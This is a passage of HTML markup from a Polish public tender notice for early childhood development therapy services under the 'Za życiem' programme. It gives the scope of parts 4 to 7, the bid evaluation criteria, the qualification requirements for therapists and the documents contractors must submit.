class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 4 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>logopedę, w tym 12 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań logopedy należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe 2.<br/>Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w sprawie<br/>szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 5 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>fizjoterapeutę, w tym 17 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań fizjoterapeuty należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 6 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>fizjoterapeutę, w tym 14 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań fizjoterapeuty należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ 7 – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez<br/>terapeutę integracji sensorycznej, w tym 14 godzin spotkań i konsultacji dla rodziców dziecka/prawnych opiekunów.<br/>Przedmiotem zamówienia jest świadczenie usług związanych z organizacją<br/>i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach rządowego programu „Za życiem” w celu<br/>zapewnienia realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego w roku 2025 w ramach<br/>zadania z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin „Za życiem”,<br/>stanowiącego załącznik do uchwały Rady Ministrów z dnia 27 grudnia 2021r. zmieniającej uchwałę w sprawie programu<br/>kompleksowego wsparcia dla rodzin „Za życiem” (M.P. z 2022 poz. 64) zwanego dalej „Programem” w zakresie realizacji<br/>zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu, określonych w art. 90v ust. 4<br/>ustawy z dnia 7 września 1991 r. o systemie oświaty oraz rozporządzeniu Ministra Edukacji Narodowej z dnia 30 sierpnia<br/>2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r.<br/>poz. 1801) wynikających z zadania 2.4 Programu: Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w<br/>okresie od 0. roku życia do rozpoczęcia nauki w szkole oraz jego rodzinie.<br/>Do zadań terapeuty Integracji Sensorycznej należeć będzie:<br/>1. Prowadzenie zajęć terapeutycznych w ramach wczesnego wspomagania rozwoju dziecka w warunkach i formach<br/>określonych w przepisach na podstawie art.127 ust.19 pkt 1 ustawy z dnia 14 grudnia 2016 r – Prawo Oświatowe<br/>2. Prowadzenie doradztwa dla rodzin dzieci z niepełnosprawnością (zgodnie z rozp MEIN z dnia 30 sierpnia 2023r w<br/>sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 r. poz.<br/>1801).<br/>3. Organizowanie spotkań i konsultacji dla rodziców/ prawnych opiekunów/opiekunów faktycznych dziecka.<br/>4. Prowadzenie dokumentacji dotyczącej realizowanych zajęć terapeutycznych oraz działań podejmowanych w ramach<br/>programu „Za życiem”.<br/>Szczegółowy opis i zakres przedmiotu zamówienia, odrębny na każdą część, określa Rozdział 5 do SWZ oraz Opis<br/>Przedmiotu Zamówienia, stanowiący Załącznik nr 5 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona według kryterium oceny ofert określonych w<br/>Rozdziale 22 SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne prowadzenia zajęć wspomagających dziecko niepełnosprawne, zagrożone niepełnosprawnością oraz jego rodzinę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie praktyczne w zawodzie nauczyciela – psychologa, pedagoga, logopedy, fizjoterapeuty, terapeuty integracji sensorycznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże że:<br/>dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, posiadającymi kwalifikacje zawodowe,<br/>uprawnienia, doświadczenie i wykształcenie, niezbędne do wykonania zamówienia, tj.<br/>• jedną osobą dla każdej części posiadającą kwalifikacje oraz przygotowanie pedagogiczne zgodne z Rozporządzeniem<br/>MEiN z dnia 14 września 2023 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli (Dz. U. 2023 poz. 2102)<br/>(dotyczy części 1-7) oraz<br/>dla części 1 – 2 :<br/>• mającą ukończone studia na kierunku pedagogika lub pedagogika specjalna w zakresie wczesnego wspomagania rozwoju<br/>dziecka i posiada przygotowanie pedagogiczne lub studia na kierunku pedagogika lub pedagogika specjalna i posiada<br/>przygotowanie pedagogiczne oraz ukończyła studia podyplomowe w zakresie wczesnego wspomagania rozwoju dziecka,<br/>terapii pedagogicznej, terapii rodzin lub innego rodzaju terapii właściwej dla pobudzania psychoruchowego i społecznego<br/>rozwoju dziecka<br/>• posiadającą co najmniej 4 letnie doświadczenie zawodowe w pracy z dzieckiem niepełnosprawnym.<br/>dla części 3 – 4:<br/>• mającą ukończone studia wyższe w zakresie logopedii oraz studia podyplomowe w zakresie neurologopedii i posiada<br/>przygotowanie pedagogiczne lub studia magisterskie na innym kierunku oraz studia podyplomowe w zakresie logopedii i<br/>neurologopedii i posiada przygotowanie pedagogiczne<br/>• posiadającą co najmniej 4 letnie doświadczenie zawodowe w pracy z dzieckiem z zaburzeniami rozwoju mowy i pracy z<br/>dzieckiem niepełnosprawnym;<br/>dla części dla 5 – 6:<br/>• mającą ukończone studia na kierunku fizjoterapia lub studia w zakresie fizjoterapii lub rehabilitacji ruchowej i posiada<br/>przygotowanie pedagogiczne<br/>• posiadającą co najmniej 4 letnie doświadczenie zawodowe w pracy z dzieckiem niepełnosprawnym<br/>dla części dla 7:<br/>• mającą ukończone studia na kierunku pedagogika lub pedagogika specjalna lub psychologia lub logopedia lub studia na<br/>kierunku fizjoterapia lub studia w zakresie fizjoterapii lub rehabilitacji ruchowej lub WWRD i posiada przygotowanie pedagogiczne <br/>• mającą ukończone studia podyplomowe lub kurs uprawniający do prowadzenia diagnozy i terapii integracji sensorycznej;<br/>• posiadającą co najmniej 4 letnie doświadczenie zawodowe w pracy z dzieckiem niepełnosprawnym.<br/>UWAGA: W przypadku, gdy wykonawca składa ofertę na więcej niż jedną część zamówienia, liczbę pracowników<br/>przewidzianych do realizacji usługi należy zsumować.<br/>2. Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części może polegać na zdolnościach<br/>technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby, niezależnie<br/>od charakteru prawnego łączących go z nimi stosunków prawnych. Wymagania dotyczące polegania na zasobach innych<br/>podmiotów opisane są w Rozdziale 12.<br/>3. Wymagania dotyczące Wykonawców wspólnie ubiegających się o udzielnie zamówienia opisane są w Rozdziale 13.<br/>4. Oceniając zdolność techniczną lub zawodową, Zamawiający działając na podstawie art. 116 ust. 2 ustawy Pzp może, na<br/>każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez<br/>Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy<br/>w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia z udziału w postępowaniu o udzielenie zamówienia Wykonawca składa:<br/>1) oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616), z innym<br/>wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji<br/>z zastrzeżeniem pkt. 10.8. SWZ;<br/>2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej zamiast dokumentu, o których<br/>mowa w ust. 10.3.1. pkt. 2 SWZ, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury -<br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument<br/>dotyczy, nie wydaje się dokumentów, o których mowa w ust. 10.3.1. pkt. 2 SWZ, zastępuje się je odpowiednio w całości lub części<br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym<br/>Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie ma<br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem<br/>samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce<br/>zamieszkania osoby, której dokument miał dotyczyć. Przepis ustępu 10.4. SWZ w zakresie terminu wystawienia dokumentów<br/>stosuje się odpowiednio.<br/>4. Odstąpienie od składania podmiotowych środków dowodowych:<br/>4.1. Zamawiający nie będzie wzywał do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą<br/>bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o<br/>informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa w<br/>ust. 10.1. SWZ dane umożliwiające dostęp do tych środków.<br/>4.2. W przypadku wskazania przez Wykonawcę dostępności podmiotowych środków dowodowych pod określonymi internetowymi<br/>adresami ogólnodostępnych i bezpłatnych baz danych, Zamawiający może żądać od Wykonawcy przedstawienia tłumaczenia na<br/>język polski pobranych samodzielnie przez Zamawiającego podmiotowych środków dowodowych.<br/>4.3. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli<br/>Wykonawca wskaże te środki (poprzez podanie numeru referencyjnego postępowania lub nazwy postępowania) oraz potwierdzi ich<br/>prawidłowość i aktualność.<br/>4.4. Zamawiający odstąpi od wezwania do złożenia oświadczenia, o którym mowa w pkt. 10.3.1.ust. 1) SWZ w sytuacji gdy w<br/>postępowaniu zostanie złożona tylko jedna oferta.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków 